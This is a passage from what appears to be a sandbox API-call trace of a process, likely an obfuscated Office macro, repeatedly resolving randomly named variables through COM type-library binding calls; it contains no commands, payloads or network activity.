ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80662, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="uAo1wABA") returned 9 [0069.355] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uAo1wABA", lHashVal=0x10c961, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.355] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uAo1wABA") returned 0x10c961 [0069.355] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="uAo1wABA" | out: _Dst="uAo1wABA") returned 0x0 [0069.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="uAo1wABA") returned 9 [0069.355] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.355] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uAo1wABA", lHashVal=0x10c961, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.355] IUnknown:Release (This=0x665ba50) returned 0xd [0069.355] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.355] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uAo1wABA", lHashVal=0x10c961, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.355] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.355] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.355] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uAo1wABA", lHashVal=0x10c961, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.356] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.356] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.356] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uAo1wABA", lHashVal=0x10c961, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.356] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80662, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="uAo1wABA") returned 9 [0069.356] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uAo1wABA", lHashVal=0x10c961, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.356] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.356] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80662 | out: _Dst=0x67c2d40) returned 0x0 [0069.356] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uAo1wABA") returned 0x10a0ea [0069.356] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_uAo1wABA" | out: _Dst="_B_var_uAo1wABA") returned 0x0 [0069.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_uAo1wABA") returned 16 [0069.356] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.356] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uAo1wABA", lHashVal=0x10a0ea, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.356] IUnknown:Release (This=0x665ba50) returned 0xd [0069.356] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.356] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uAo1wABA", lHashVal=0x10a0ea, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.356] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.356] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.356] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uAo1wABA", lHashVal=0x10a0ea, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.356] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.356] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.356] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uAo1wABA", lHashVal=0x10a0ea, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.356] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.356] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.356] IUnknown:Release (This=0x665ba50) returned 0xd [0069.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1262e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_uAo1wABA") returned 16 [0069.356] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uAo1wABA", lHashVal=0x10a0ea, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x77003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x77003100000000, pDummy=0x0) returned 0x0 [0069.357] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80662 | out: _Dst=0x144ec0) returned 0x0 [0069.357] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZADDcUA", lHashVal=0x10baca, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8063a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZADDcUA") returned 8 [0069.357] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZADDcUA", lHashVal=0x10baca, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8063a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZADDcUA") returned 8 [0069.357] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZADDcUA", lHashVal=0x10baca, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.357] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZADDcUA") returned 0x10baca [0069.357] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="ZADDcUA" | out: _Dst="ZADDcUA") returned 0x0 [0069.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="ZADDcUA") returned 8 [0069.357] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.357] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZADDcUA", lHashVal=0x10baca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.357] IUnknown:Release (This=0x665ba50) returned 0xd [0069.357] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.357] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZADDcUA", lHashVal=0x10baca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.357] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.357] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.357] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZADDcUA", lHashVal=0x10baca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.357] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.357] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.357] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZADDcUA", lHashVal=0x10baca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.357] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8063a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZADDcUA") returned 8 [0069.358] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZADDcUA", lHashVal=0x10baca, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.358] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.358] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8063a | out: _Dst=0x67c2d40) returned 0x0 [0069.358] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZADDcUA") returned 0x10aecd [0069.358] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_ZADDcUA" | out: _Dst="_B_var_ZADDcUA") returned 0x0 [0069.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_ZADDcUA") returned 15 [0069.358] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.358] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZADDcUA", lHashVal=0x10aecd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.358] IUnknown:Release (This=0x665ba50) returned 0xd [0069.358] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.358] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZADDcUA", lHashVal=0x10aecd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.358] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.358] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.358] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZADDcUA", lHashVal=0x10aecd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.358] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.358] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.358] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZADDcUA", lHashVal=0x10aecd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.358] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.358] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.358] IUnknown:Release (This=0x665ba50) returned 0xd [0069.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1265e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_ZADDcUA") returned 15 [0069.358] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZADDcUA", lHashVal=0x10aecd, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x63004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x63004400000000, pDummy=0x0) returned 0x0 [0069.359] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8063a | out: _Dst=0x144ec0) returned 0x0 [0069.359] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wUA41Aok", lHashVal=0x108e27, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8068e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wUA41Aok") returned 9 [0069.359] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wUA41Aok", lHashVal=0x108e27, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8068e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wUA41Aok") returned 9 [0069.359] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wUA41Aok", lHashVal=0x108e27, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.359] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wUA41Aok") returned 0x108e27 [0069.359] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wUA41Aok" | out: _Dst="wUA41Aok") returned 0x0 [0069.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wUA41Aok") returned 9 [0069.359] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.359] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wUA41Aok", lHashVal=0x108e27, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.359] IUnknown:Release (This=0x665ba50) returned 0xd [0069.359] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.359] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wUA41Aok", lHashVal=0x108e27, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.359] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.359] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.359] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wUA41Aok", lHashVal=0x108e27, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.359] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.359] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.359] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wUA41Aok", lHashVal=0x108e27, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.359] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8068e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wUA41Aok") returned 9 [0069.359] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wUA41Aok", lHashVal=0x108e27, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.360] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.360] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8068e | out: _Dst=0x67c2d40) returned 0x0 [0069.360] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wUA41Aok") returned 0x1065b0 [0069.360] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wUA41Aok" | out: _Dst="_B_var_wUA41Aok") returned 0x0 [0069.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wUA41Aok") returned 16 [0069.360] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.360] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wUA41Aok", lHashVal=0x1065b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.360] IUnknown:Release (This=0x665ba50) returned 0xd [0069.360] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.360] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wUA41Aok", lHashVal=0x1065b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.360] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.360] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.360] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wUA41Aok", lHashVal=0x1065b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.360] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.360] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.360] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wUA41Aok", lHashVal=0x1065b0, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.360] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.360] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.360] IUnknown:Release (This=0x665ba50) returned 0xd [0069.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1268e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_wUA41Aok") returned 16 [0069.360] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wUA41Aok", lHashVal=0x1065b0, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x31003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x31003400000000, pDummy=0x0) returned 0x0 [0069.360] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8068e | out: _Dst=0x144ec0) returned 0x0 [0069.361] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mQ1BQQ", lHashVal=0x103230, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b806ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mQ1BQQ") returned 7 [0069.361] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mQ1BQQ", lHashVal=0x103230, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b806ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mQ1BQQ") returned 7 [0069.361] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mQ1BQQ", lHashVal=0x103230, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.361] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mQ1BQQ") returned 0x103230 [0069.361] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="mQ1BQQ" | out: _Dst="mQ1BQQ") returned 0x0 [0069.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="mQ1BQQ") returned 7 [0069.361] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.361] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="mQ1BQQ", lHashVal=0x103230, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.361] IUnknown:Release (This=0x665ba50) returned 0xd [0069.361] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.361] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="mQ1BQQ", lHashVal=0x103230, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.361] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.361] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.361] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="mQ1BQQ", lHashVal=0x103230, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.361] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.361] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.361] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="mQ1BQQ", lHashVal=0x103230, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.361] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b806ba, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mQ1BQQ") returned 7 [0069.361] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mQ1BQQ", lHashVal=0x103230, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.362] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.362] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b806ba | out: _Dst=0x67c2d40) returned 0x0 [0069.362] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_mQ1BQQ") returned 0x10acd9 [0069.362] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_mQ1BQQ" | out: _Dst="_B_var_mQ1BQQ") returned 0x0 [0069.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_mQ1BQQ") returned 14 [0069.362] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.362] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_mQ1BQQ", lHashVal=0x10acd9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.362] IUnknown:Release (This=0x665ba50) returned 0xd [0069.362] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.362] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_mQ1BQQ", lHashVal=0x10acd9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.362] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.362] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.362] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_mQ1BQQ", lHashVal=0x10acd9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.362] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.362] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.362] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_mQ1BQQ", lHashVal=0x10acd9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.362] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.362] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.362] IUnknown:Release (This=0x665ba50) returned 0xd [0069.362] MultiByteToWideChar (in: 